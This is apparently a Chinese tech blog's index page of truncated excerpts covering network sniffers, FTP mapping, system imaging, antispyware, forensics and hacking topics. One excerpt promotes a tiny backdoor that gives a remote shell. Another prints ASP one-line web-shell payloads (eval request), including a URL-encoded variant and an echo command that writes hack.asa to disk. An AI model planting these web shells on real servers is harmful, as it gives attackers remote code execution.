1kb正向连接零管道后门代码
说明:
不用我多说了吧..黑客一般都会使用的后门程序..
这里只是简单的演示一下..没有添加进程隐藏功能
程序可以在Win9x,Win2k,WinXP,Win2k3上使用
程序体积只有1k(FSG压缩一下会更小)
测试:
本地开启NetCat等工具,连接远程计算机80端口,会得到一个Shell
...
- 添加新评论
- 阅读次数:
Tcptrack是一个能够显示特定端口上有关TCP连接的嗅探器,它会监视正在发生的所有的连接,并且以一种友好的界面显示相关信息。虽然它采用字符用户界面,却易于理解和查看。Tcptrack随现在流行的几种Linux发行版本打包发行。Tcptrack的最新版本是2006年12月发布的1.2.0。用户可以从http://www.rhythm.cx/%7Esteve/devel/tcptrack/下载其源代码。
...
- 添加新评论
- 阅读次数:
有多家公司都推出过用于捕获网络流量并进行分析和查看的流量分析器,而且都当仁不让地取名为Network Monitor!。客观讲,微软的NM(Network Monitor)并非领袖,很象IE;它最初的NT 4.0版本主要有两个:一个是作为Windows Server 2003的免费附件;另一个相当于是适用于SMS用户的混合模式下的溴探程序。
不过,微软在去年低调推出的NM3.0却显示出诱人的成熟感,并已经具备第三方工具如WireShark (以前的名称是"Ethereal")的酷劲,笔者曾经去http://connect.microsoft.com/荡一个,马上发现它的无线溴探功能以及右点鼠标就会生成的过滤方式。
- 添加新评论
- 阅读次数:
FTP站点是因特网上比较重要的资源,虽然有了CuteFTP、FlashFXP、LeapFTP等这些优秀的FTP客户端软件,但是登录FTP网站和操作FTP站点上的文件或文件夹仍然比较繁琐。我们知道,在资源管理器器可以把一个远程电脑上的文件夹映射成一个分区,那么能不能把一个远程FTP站点映射成本地资源管理器上的一个分区呢?答案是肯定的,WebDrive这款软件能轻松帮助我们实现这个愿望。
软件名称:WebDrive
最新版本:V 7.10.1459
软件大小:7009KB
...
- 添加新评论
- 阅读次数:
遥想当年,浏览器还不是微软的天下,IE正在努力地跟当时的霸主Netscape抢用户。为了增加胜算,微软将IE与操作系统整合,开发出了ActiveX平台。这个东东可以用来在IE浏览器中完成许多原本该由其它应用程序实现的功能——比如放动画、播音乐、登录网上银行、修改系统注册表……总之就是,ActiveX强大得没天理。结果,当IE垄断浏览器市场以后,ActiveX就被很多有良或无良的程序开发者盯上了,而那些无良开发成果的典型代表,就是广大网民深恶痛绝的“流氓软件”。
...
- 添加新评论
- 阅读次数:
对系统进行备份或恢复,可能大家首选ghost。 随着Vista的发布,微软还给我们送来了PE 2.0,ImageX是运行于PE 2.0的一个命令提示符工具,通过它可将一台电脑的系统分区捕获为映像文件,再还原到其它电脑上,而且这两台电脑的硬件配置不必相同,就凭这一点,也许你会放弃Ghost。
一、通过AIK获取含ImageX的PE 2
从微软网站下载并安装AIK,安装时,请按默认的路径和组件安装,不然,后面的很多命令得修改——特别是对不太熟悉命令提示符的朋友而言。
...
- 添加新评论
- 阅读次数:
来源:安天团队
收集:X.DW
一般来说就是针对有输入接口的地方插入一句话后门
如下面所示:
(1)<%eval request("#")%>
(2)转换后的代码%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%23%22%29%25%3E 63字节
(3)通过echo命令 echo ^<^%eval request(chr(35))%^> >d:\hack.asa
...
- 添加新评论
- 阅读次数:
Ashampoo AntiSpyWare 一款全面呵护你个人计算机免受恶意入侵的安全工具。汲取了ewido的精华,采用汲取了ewido最最精华的东西(20多万的ewido特征库和扫描速度优秀的ewido扫描引擎)添加自己的独创(文件删除器, rootkit侦测工具,网络痕迹清除),被称为ewido的豪华版本在经过几分瘦身(占用系统资源比ewido少), 与反木马间谍软件两大巨头 webroot spysweeper 和 counterspy 有形成三足鼎立之趋势。
其主要特性有:
...
- 添加新评论
- 阅读次数:
最近经常收到同事的抱怨,说是浏览网页越来越慢。单位大概200多台电脑,划分成2个VLAN,我通过科来分析软件抓包,网络里没有广播风暴,也没有arp病毒。其实占用网络带宽的元凶,主要还是因为局域网内存在大量的P2P下载和网络视频。但是我们的防火墙并没有限制连接数或者限制带宽的功能,所以我只能通过防火墙的连接数记录,将一些连接数比较大的电脑封掉,不过总体实施效果并不好。而且经常因此接到“骚扰电话”,有哀求的,有恐吓的,还有求情的。哎,网管不好当啊。。。。。。
...
- 添加新评论
- 阅读次数:
随着网络信息技术的发展,计算机网络逐渐成为人们生活和工作中不可或缺的组成部分,它改变了人们传统的工作习惯和生活节奏。在人们越来越依赖网络的今天,伴随着计算机网络的日新月异,计算机网络犯罪也逐渐走进了我们的视线。黑客攻击、网络钓鱼,僵尸网络,这些以谋取非法利益为目的的新兴犯罪手段,使人们诚惶诚恐。不仅仅是因为担心数据丢失给企业和个人造成经济损失,更重要的原因是当企业或个人发现了被黑客攻击,被病毒侵害而造成损失后,往往不知道该怎么办,举报到相关部门,又缺乏足够的证据,毕竟这是虚拟的世界,找证据非常的难。这也是本文要和大家探讨的问题:计算机取证。
...- 添加新评论
- 阅读次数: